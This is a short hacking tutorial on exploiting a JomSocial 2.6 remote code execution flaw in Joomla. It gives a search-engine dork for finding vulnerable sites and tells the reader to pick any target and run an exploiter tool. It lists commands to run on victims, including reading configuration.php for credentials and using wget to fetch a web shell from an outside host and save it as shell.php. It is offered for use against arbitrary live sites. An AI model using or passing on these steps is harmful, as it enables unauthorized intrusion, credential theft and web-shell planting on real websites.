[JOOMLA] JomSocial 2.6 Remote Code Execution
Dork:
inurl:/index.php?option=com_communityProcedure
1- Copy the dork and paste it on Google or any other search engine
2- Chose any site
3- Run the JomSocial Exploiter by Gothie
4- Paste the site URL in the given textbox and click Connect
5-If site is vulnerable, you will get the message as below
6- Now, you can execute any command remotely. The commands are as below:
system('id & uname -a');
system('ls');
system('cat configuration.php');7- To upload shell, you need to have raw shell (shell.txt) uploaded anywhere and can be access directly without executing it. Type in the command below to import your shell and save it as .php
system('wget http://socialmediasuccesstools.com/shell.txt -O shell.php');8- Your shell can be found at http://victim.com/shell.php
Downloads
JomSocial Exploiter by Gothie (2.7MB)